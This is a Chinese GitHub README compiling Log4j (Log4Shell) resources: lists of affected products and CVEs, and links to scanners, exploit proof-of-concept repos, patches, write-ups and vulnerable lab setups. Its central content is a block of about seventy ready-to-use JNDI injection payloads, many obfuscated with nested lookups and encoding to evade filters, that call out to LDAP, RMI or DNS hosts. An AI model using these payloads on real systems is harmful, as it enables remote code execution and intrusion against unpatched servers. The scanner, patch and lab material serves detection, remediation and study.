├── README.md
└── TEMP
    └── wx.png


/README.md:
--------------------------------------------------------------------------------
  1 | # HackLog4j-永恒之恶龙
  2 | 
  3 | 本项目用来致敬全宇宙最无敌的Java日志库！同时也记录自己在学习Log4j漏洞过程中遇到的一些内容。本项目会持续更新，本项目创建于2021年12月10日，最近的一次更新时间为2022年12月27日。作者：[0e0w](https://github.com/0e0w)
  4 | 
  5 | - [00-Log4j永恒恶龙](https://github.com/HackJava/HackLog4j2#00-log4j%E6%B0%B8%E6%81%92%E6%81%B6%E9%BE%99)
  6 | - [01-Log4j基础知识](https://github.com/HackJava/HackLog4j2#01-log4j%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86)
  7 | - [02-Log4j框架识别](https://github.com/HackJava/HackLog4j2#02-log4j%E6%A1%86%E6%9E%B6%E8%AF%86%E5%88%AB)
  8 | - [03-Log4j上层建筑](https://github.com/HackJava/HackLog4j2#03-log4j%E4%B8%8A%E5%B1%82%E5%BB%BA%E7%AD%91)
  9 | - [04-Log4j漏洞汇总](https://github.com/HackJava/HackLog4j2#04-log4j%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB)
 10 | - [05-Log4j检测利用](https://github.com/HackJava/HackLog4j2#05-log4j%E6%A3%80%E6%B5%8B%E5%88%A9%E7%94%A8)
 11 | - [06-Log4j漏洞修复](https://github.com/HackJava/HackLog4j2#06-log4j%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D)
 12 | - [07-Log4j分析文章](https://github.com/HackJava/HackLog4j2#07-log4j%E5%88%86%E6%9E%90%E6%96%87%E7%AB%A0)
 13 | - [08-Log4j靶场环境](https://github.com/HackJava/HackLog4j2#08-log4j%E9%9D%B6%E5%9C%BA%E7%8E%AF%E5%A2%83)
 14 | 
 15 | ## 00-Log4j永恒恶龙
 16 | 
 17 | - https://github.com/Goqi/ELong 
 18 | 
 19 | ## 01-Log4j基础知识
 20 | 
 21 | - https://github.com/apache/logging-log4j2
 22 | 
 23 | ## 02-Log4j框架识别
 24 | 
 25 | - 待更新
 26 | 
 27 | ## 03-Log4j上层建筑
 28 | 
 29 | **log4j + ？ = rce ！**
 30 | 
 31 | - [x] Apache Flink
 32 | - [x] Apache Struts2
 33 | - [ ] Apache Spark
 34 | - [x] Apache Storm
 35 | - [ ] Apache Tomcat
 36 | - [x] Apache Solr
 37 | - [ ] Apache Dubbo
 38 | - [ ] Apache Druid
 39 | - [x] Apache OFBiz
 40 | - [ ] Apache Flume
 41 | - [ ] Redis
 42 | - [ ] Logstash
 43 | - [ ] ElasticSearch
 44 | - [ ] Apache Kafka
 45 | - [ ] Ghidra
 46 | - [ ] Spring-Boot-strater-log4j2
 47 | - [ ] VMware vCenter
 48 | - [ ] Minecraft
 49 | - [x] hikvision
 50 | - ......
 51 | - https://fofa.so/static_pages/log4j2
 52 | - https://github.com/cisagov/log4j-affected-db
 53 | - https://github.com/YfryTchsGD/Log4jAttackSurface
 54 | - https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes
 55 | - https://github.com/CrackerCat/Log4jAttackSurface
 56 | - https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/usages
 57 | - https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html
 58 | - https://github.com/authomize/log4j-log4shell-affected
 59 | - https://github.com/NS-Sp4ce/Vm4J
 60 | - https://github.com/dinosn/hikvision
 61 | 
 62 | ## 04-Log4j漏洞汇总
 63 | 
 64 | - CVE-2021-45105
 65 | - CVE-2021-44228
 66 | - CVE-2021-4104
 67 | - CVE-2019-17571
 68 | - CVE-2017-5645
 69 | 
 70 | ## 05-Log4j检测利用
 71 | 
 72 | 如何判断一个网站是否存在Log4j JNDI注入漏洞？如何查找内网中存在Log4j JNDI注入漏洞？
 73 | 
 74 | 一、Payload
 75 | 
 76 | ```
 77 | ${jndi:ldap://127.0.0.1/poc}
 78 | ${jndi:rmi://127.0.0.1/poc}
 79 | ${jndi:dns://127.0.0.1/poc}
 80 | ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}
 81 | ${${::-j}ndi:rmi://127.0.0.1/poc}
 82 | ${${lower:jndi}:${lower:rmi}://127.0.0.1/poc}
 83 | ${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc}
 84 | ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://127.0.0.1/poc}
 85 | ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://127.0.0.1/poc}
 86 | ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}}://127.0.0.1/poc}
 87 | ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
 88 | $%7Bjndi:ldap://127.0.0.1/poc%7D
 89 | ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}127.0.0.1/poc}
 90 | ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://127.0.0.1/poc}
 91 | ${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc}
 92 | ${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc}
 93 | ${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}127.0.0.1/poc}
 94 | ${jndi:${lower:l}${lower:d}ap://127.0.0.1/poc}
 95 | ${jndi:ldap://127.0.0.1#127.0.0.1/poc}
 96 | ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://k123.k123.k123/poc}
 97 | ${${::-j}ndi:rmi://k123.k123.k123/ass}
 98 | ${jndi:rmi://k8.k123.k123}
 99 | ${${lower:jndi}:${lower:rmi}://k8.k123.k123/poc}
100 | ${${lower:${lower:jndi}}:${lower:rmi}://k8.k123.k123/poc}
101 | ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://k8.k123.k123/poc}
102 | j${loWer:Nd}i${uPper::}
103 | ${jndi:ldaps://127.0.0.1/poc}
104 | ${jndi:iiop://127.0.0.1/poc}
105 | ${date:ldap://127.0.0.1/poc}
106 | ${java:ldap://127.0.0.1/poc}
107 | ${marker:ldap://127.0.0.1/poc}
108 | ${ctx:ldap://127.0.0.1/poc}
109 | ${lower:ldap://127.0.0.1/poc}
110 | ${upper:ldap://127.0.0.1/poc}
111 | ${main:ldap://127.0.0.1/poc}
112 | ${jvmrunargs:ldap://127.0.0.1/poc}
113 | ${sys:ldap://127.0.0.1/poc}
114 | ${env:ldap://127.0.0.1/poc}
115 | ${log4j:ldap://127.0.0.1/poc}
116 | ${j${k8s:k5:-ND}i${sd:k5:-:}${lower:l}d${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
117 | ${jndi:rmi://127.0.0.1}/
118 | ${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1/poc}
119 | ${jndi:dns://127.0.0.1}
120 | ${j${k8s:k5:-ND}i:ldap://127.0.0.1/poc}
121 | ${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//127.0.0.1/poc}
122 | ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}
123 | ${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//127.0.0.1/poc}
124 | ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}
125 | ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//127.0.0.1/poc}
126 | ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1/poc}
127 | ${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//127.0.0.1/poc
128 | ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//127.0.0.1/poc}
129 | ${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1}
130 | ${jnd${upper:i}:ldap://127.0.0.1/poc}
131 | ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1/poc}
132 | ${jndi:ldap://127.0.0.1#127.0.0.1:1389/poc}
133 | ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
134 | ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}
135 | ${${lower:jndi}:${lower:ldap}://127.0.0.1/poc}
136 | ${${::-j}ndi:rmi://127.0.0.1/poc}
137 | ${${lower:${lower:jndi}}:${lower:ldap}://127.0.0.1/poc}
138 | ${${lower:jndi}:${lower:rmi}://127.0.0.1/poc}
139 | ${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://127.0.0.1/poc}
140 | ${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc}
141 | ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}d${lower:a}p://127.0.0.1/poc}
142 | ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://127.0.0.1/poc}
143 | ${j${env:DOESNOTEXIST:-}ndi:ldap://127.0.0.1/poc}
144 | ${j${env:DOESNOTEXIST:-}ndi:rmi://127.0.0.1/poc}
145 | ${${: : : : ::: :: :: : :::-j}ndi:ldap://127.0.0.1/poc}
146 | ${${: : : : ::: :: :: : :::-j}ndi:rmi://127.0.0.1/poc}
147 | ${${::::::::::::::-j}ndi:ldap://127.0.0.1/poc}
148 | ${${::::::::::::::-j}ndi:rmi://127.0.0.1/poc}
149 | ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
150 | ```
151 | 
152 | - https://github.com/trickest/log4j
153 | - https://github.com/test502git/log4j-fuzz-head-poc
154 | - https://github.com/woodpecker-appstore/log4j-payload-generator
155 | - https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
156 | 
157 | 二、源码检测
158 | 
159 | - https://github.com/google/log4jscanner
160 | - https://github.com/hupe1980/scan4log4shell
161 | - https://github.com/logpresso/CVE-2021-44228-Scanner
162 | - https://github.com/xsultan/log4jshield
163 | - https://github.com/Joefreedy/Log4j-Windows-Scanner
164 | - https://github.com/back2root/log4shell-rex
165 | - https://github.com/Neo23x0/log4shell-detector
166 | - https://github.com/dwisiswant0/look4jar
167 | - https://github.com/Qualys/log4jscanwin
168 | - https://github.com/lijiejie/log4j2_vul_local_scanner
169 | - https://github.com/palantir/log4j-sniffer
170 | - https://github.com/mergebase/log4j-detector
171 | - https://www.t00ls.cc/thread-63931-1-1.html
172 | - https://github.com/darkarnium/Log4j-CVE-Detect
173 | - https://github.com/whitesource/log4j-detect-distribution
174 | - https://github.com/fox-it/log4j-finder
175 | - https://github.com/webraybtl/Log4j
176 | 
177 | 三、出网检测
178 | 
179 | - https://github.com/dorkerdevil/Log-4-JAM
180 | - https://github.com/adilsoybali/Log4j-RCE-Scanner
181 | - https://github.com/cisagov/log4j-scanner
182 | 
183 | 四、不出网检测
184 | 
185 | - https://github.com/For-ACGN/Log4Shell
186 | - https://github.com/proferosec/log4jScanner
187 | - https://github.com/Y0-kan/Log4jShell-Scan
188 | - https://github.com/j5s/Log4j2Scan
189 | - https://github.com/EmYiQing/JNDIScan
190 | 
191 | 五、主动扫描
192 | 
193 | - https://github.com/ilsubyeega/log4j2-exploits
194 | - https://github.com/Cyronlee/log4j-rce
195 | - https://github.com/handbye/Log4j2Fuzz
196 | 
197 | 六、被动扫描
198 | 
199 | - https://github.com/silentsignal/burp-log4shell
200 | - https://github.com/pmiaowu/log4jScan
201 | - https://github.com/guguyu1/log4j2_burp_scan
202 | - https://github.com/whwlsfb/Log4j2Scan
203 | - https://github.com/bigsizeme/Log4j-check
204 | - https://github.com/f0ng/log4j2burpscanner
205 | - https://github.com/pmiaowu/log4j2Scan
206 | - https://github.com/bit4woo/log4jScan
207 | - https://github.com/izj007/Log4j2Scan
208 | - https://github.com/gh0stkey/Log4j2-RCE-Scanner
209 | - https://github.com/p1n93r/Log4j2Scan
210 | - https://github.com/mostwantedduck/BurpLog4j2Scan
211 | - https://github.com/j3ers3/Log4Scan
212 | 
213 | 七、Header检测
214 | 
215 | - https://github.com/fullhunt/log4j-scan
216 | - https://github.com/0xInfection/LogMePwn
217 | - https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit
218 | 
219 | 八、请求参数检测
220 | 
221 | 九、其他工具
222 | 
223 | - https://github.com/dbgee/log4j2_rce
224 | - https://github.com/ReadER-L/log4j-rce
225 | - https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept
226 | - https://github.com/Seayon/Log4j2RCE_Demo
227 | - https://github.com/elbosso/Log4J2CustomJMXAppender
228 | - https://github.com/ahus1/logging-and-tracing
229 | - https://github.com/stuartwdouglas/log4j-jndi-agent
230 | - https://github.com/xiajun325/apache-log4j-rce-poc
231 | - https://github.com/caoli5288/log4j2jndiinterceptor
232 | - https://github.com/y35uishere/Log4j2-CVE-2021-44228
233 | - https://github.com/ErdbeerbaerLP/log4jfix
234 | - https://github.com/0x0021h/apache-log4j-rce
235 | - https://github.com/Gav06/RceFix
236 | - https://github.com/UltraVanilla/LogJackFix
237 | - https://github.com/iamsino/log4j2-Exp
238 | - https://github.com/bkfish/Apache-Log4j-Learning
239 | - https://github.com/LoliKingdom/NukeJndiLookupFromLog4j
240 | - https://github.com/tangxiaofeng7/apache-log4j-poc
241 | - https://github.com/h1b1ki/apache-log4j-poc
242 | - https://github.com/EmptyIrony/Log4j2Fixer
243 | - https://github.com/AzisabaNetwork/Log4j2Fix
244 | - https://github.com/apple502j/Log4Jail
245 | - https://github.com/jacobtread/L4J-Vuln-Patch
246 | - https://github.com/stardust1900/log4j-2.15.0
247 | - https://github.com/nest-x/nestx-log4js
248 | - https://github.com/Marcelektro/Log4J-RCE-Implementation
249 | - https://github.com/jdremillard/json-logging
250 | - https://github.com/parayaluyanta/sell-logs-and-peace
251 | - https://github.com/albar965/atools
252 | - https://github.com/Al0sc/Log4j-rce
253 | - https://github.com/ven0n1/Log4jv2Maven
254 | - https://github.com/akunzai/log4j2-sendgrid-appender
255 | - https://github.com/inbug-team/Log4j_RCE_Tool
256 | - https://github.com/zlepper/CVE-2021-44228-Test-Server
257 | - https://github.com/webraybtl/Log4j
258 | - https://github.com/numanturle/Log4jNuclei
259 | - https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
260 | - https://github.com/kozmer/log4j-shell-poc
261 | - https://github.com/hackerhackrat/Log4j2-RCE-burp-plugin
262 | - https://github.com/mzlogin/CVE-2021-44228-Demo
263 | - https://github.com/greymd/CVE-2021-44228
264 | - https://github.com/Cybereason/Logout4Shell
265 | - https://github.com/webraybtl/log4j-snort
266 | - https://github.com/corretto/hotpatch-for-apache-log4j2
267 | - https://github.com/alexandre-lavoie/python-log4rce
268 | - https://github.com/hillu/local-log4j-vuln-scanner
269 | - https://github.com/leonjza/log4jpwn
270 | - https://github.com/cyberstruggle/L4sh
271 | - https://github.com/cckuailong/log4shell_1.x
272 | - https://github.com/zhzyker/logmap
273 | - https://github.com/LoRexxar/log_dependency_checklist
274 | - https://github.com/0xDexter0us/Log4J-Scanner
275 | - https://github.com/cckuailong/Log4j_CVE-2021-45046
276 | - https://github.com/KpLi0rn/Log4j2Scan
277 | - https://github.com/righel/log4shell_nse
278 | - https://github.com/Ch0pin/log4JFrida
279 | - https://github.com/mycve/HTTPHeaderInjectBrowser
280 | - https://github.com/ihebski/log4j-Scanner
281 | - https://github.com/Yihsiwei/Log4j-exp
282 | - https://github.com/rz7d/log4j-force-upgrader
283 | - https://github.com/xsser/log4jdemoforRCE
284 | - https://github.com/e5g/Log-4J-Exploit-Fix
285 | - https://github.com/Re1own/Apache-log4j-POC
286 | - https://github.com/jas502n/Log4j2-CVE-2021-44228
287 | - https://github.com/ChloePrime/fix4log4j
288 | - https://github.com/toString122/log4j2_exp
289 | - https://github.com/shanfenglan/apache_log4j_poc
290 | - https://github.com/dbgee/CVE-2021-44228
291 | - https://github.com/lcosmos/apache-log4j-poc
292 | - https://github.com/dbgee/CVE-2021-44228
293 | - https://github.com/lcosmos/apache-log4j-poc
294 | - https://github.com/aalex954/Log4PowerShell
295 | - https://github.com/fox-it/log4shell-pcaps
296 | - https://github.com/Qerim-iseni09/ByeLog4Shell
297 | 
298 | ## 06-Log4j漏洞修复
299 | 
300 | - https://github.com/360-CERT/Log4ShellPatch
301 | - https://github.com/javasec/log4j-patch
302 | - https://github.com/simonis/Log4jPatch
303 | - https://github.com/FrankHeijden/Log4jFix
304 | - https://github.com/Szczurowsky/Log4j-0Day-Fix
305 | - https://github.com/SumoLogic/sumologic-log4j2-appender
306 | - https://github.com/chaitin/log4j2-vaccine
307 | - https://github.com/zhangyoufu/log4j2-without-jndi
308 | - https://github.com/CreeperHost/Log4jPatcher
309 | - https://github.com/boundaryx/cloudrasp-log4j2
310 | - https://github.com/DichuuCraft/LOG4J2-3201-fix
311 | - https://github.com/DichuuCraft/LOG4J2-3201-fix
312 | 
313 | ## 07-Log4j分析文章
314 | 
315 | - https://mp.weixin.qq.com/s/4cvooT4tfQhjL7t4GFzYFQ
316 | - https://mp.weixin.qq.com/s/l7iclJRegADs3oiEdcgAvQ
317 | - https://mp.weixin.qq.com/s/nOmQFq4KxM9AZ_HYIq1_CQ
318 | - https://mp.weixin.qq.com/s/K74c1pTG6m5rKFuKaIYmPg
319 | - https://mp.weixin.qq.com/s/AWhV-QdkQ6i2IEZSVhe-Kg
320 | - https://mp.weixin.qq.com/s/iHqwL6jslyCV_0jtdVj82A
321 | - https://lorexxar.cn/2021/12/10/log4j2-jndi
322 | - https://www.t00ls.cc/thread-63705-1-1.html
323 | - https://mp.weixin.qq.com/s/vAE89A5wKrc-YnvTr0qaNg
324 | 
325 | ## 08-Log4j靶场环境
326 | 
327 | - https://hub.docker.com/u/vulfocus
328 | - https://github.com/jweny/log4j-web-env
329 | - https://github.com/fengxuangit/log4j_vuln
330 | - https://www.t00ls.cc/thread-63695-1-1.html
331 | - https://github.com/christophetd/log4shell-vulnerable-app
332 | - https://github.com/Adikso/minecraft-log4j-honeypot
333 | - https://github.com/try777-try777/reVul-apache-log4j2-rec
334 | - https://github.com/EmYiQing/Log4j2DoS
335 | - https://github.com/tothi/log4shell-vulnerable-app
336 | - https://github.com/Anonymous-ghost/log4jVul
337 | - https://github.com/cyberxml/log4j-poc
338 | 
339 | ![](TEMP/wx.png)
340 | 
341 | [![Stargazers over time](https://starchart.cc//0e0w/HackLog4j.svg)](https://starchart.cc/0e0w/HackLog4j)


--------------------------------------------------------------------------------
/TEMP/wx.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HackJava/Log4j2/c209591086a980e86bb035e70eae7e70832adb17/TEMP/wx.png


--------------------------------------------------------------------------------